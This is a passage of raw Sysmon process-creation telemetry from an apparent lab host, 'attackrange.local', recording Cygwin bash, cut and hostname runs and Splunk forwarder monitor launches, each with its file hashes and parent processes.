-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000062939Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:38.655{A8622C2F-567E-6078-590D-00000000AE01}5116C:\cygwin64\bin\cut.exe-----"C:\cygwin64\bin\cut.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-567E-6078-570D-00000000AE01}3740C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062920Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:38.647{A8622C2F-567E-6078-580D-00000000AE01}5224C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-567E-6078-560D-00000000AE01}5008C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062913Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:38.646{A8622C2F-567E-6078-570D-00000000AE01}3740C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062899Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:38.637{A8622C2F-567E-6078-560D-00000000AE01}5008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:31.468{A8622C2F-5677-6078-550D-00000000AE01}5456C:\cygwin64\bin\cut.exe-----"C:\cygwin64\bin\cut.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-5677-6078-530D-00000000AE01}7120C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:31.459{A8622C2F-5677-6078-540D-00000000AE01}6824C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5677-6078-520D-00000000AE01}7060C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062838Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:31.458{A8622C2F-5677-6078-530D-00000000AE01}7120C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062824Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:31.449{A8622C2F-5677-6078-520D-00000000AE01}7060C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062790Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:22.739{A8622C2F-566E-6078-510D-00000000AE01}1552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062773Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:20.569{A8622C2F-566C-6078-500D-00000000AE01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062762Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:19.958{A8622C2F-566B-6078-4F0D-00000000AE01}5052C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062750Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:19.306{A8622C2F-566B-6078-4E0D-00000000AE01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062739Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:17.570{A8622C2F-5669-6078-4D0D-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:16.888{A8622C2F-5668-6078-4C0D-00000000AE01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062719Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:16.268{A8622C2F-5668-6078-4B0D-00000000AE01}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062701Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:14.651{A8622C2F-5666-6078-4A0D-00000000AE01}5840C:\cygwin64\bin\cut.exe-----"C:\cygwin64\bin\cut.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-5666-6078-490D-00000000AE01}5340C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062683Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:14.641{A8622C2F-5666-6078-490D-00000000AE01}5340C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062656Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:09.878{A8622C2F-5661-6078-480D-00000000AE01}5632C:\cygwin64\bin\cut.exe-----"C:\cygwin64\bin\cut.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-5661-6078-470D-00000000AE01}5320C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062638Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:09.867{A8622C2F-5661-6078-470D-00000000AE01}5320C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062611Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:07.993{A8622C2F-565F-6078-460D-00000000AE01}6268C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062501Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:42.076{A8622C2F-5646-6078-450D-00000000AE01}6968C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5646-6078-440D-00000000AE01}6656C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:42.066{A8622C2F-5646-6078-440D-00000000AE01}6656C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:22.732{A8622C2F-5632-6078-430D-00000000AE01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062369Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:20.562{A8622C2F-5630-6078-420D-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:19.872{A8622C2F-562F-6078-410D-00000000AE01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062346Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:19.288{A8622C2F-562F-6078-400D-00000000AE01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:17.501{A8622C2F-562D-6078-3F0D-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:16.881{A8622C2F-562C-6078-3E0D-00000000AE01}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062311Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:16.261{A8622C2F-562C-6078-3D0D-00000000AE01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062109Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:22.731{A8622C2F-55F6-6078-3C0D-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:20.592{A8622C2F-55F4-6078-3B0D-00000000AE01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:19.962{A8622C2F-55F3-6078-3A0D-00000000AE01}4596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062070Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:19.280{A8622C2F-55F3-6078-390D-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062056Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:17.536{A8622C2F-55F1-6078-380D-00000000AE01}5008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062046Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:16.860{A8622C2F-55F0-6078-370D-00000000AE01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062036Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:16.250{A8622C2F-55F0-6078-360D-00000000AE01}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061826Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:22.717{A8622C2F-55BA-6078-350D-00000000AE01}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 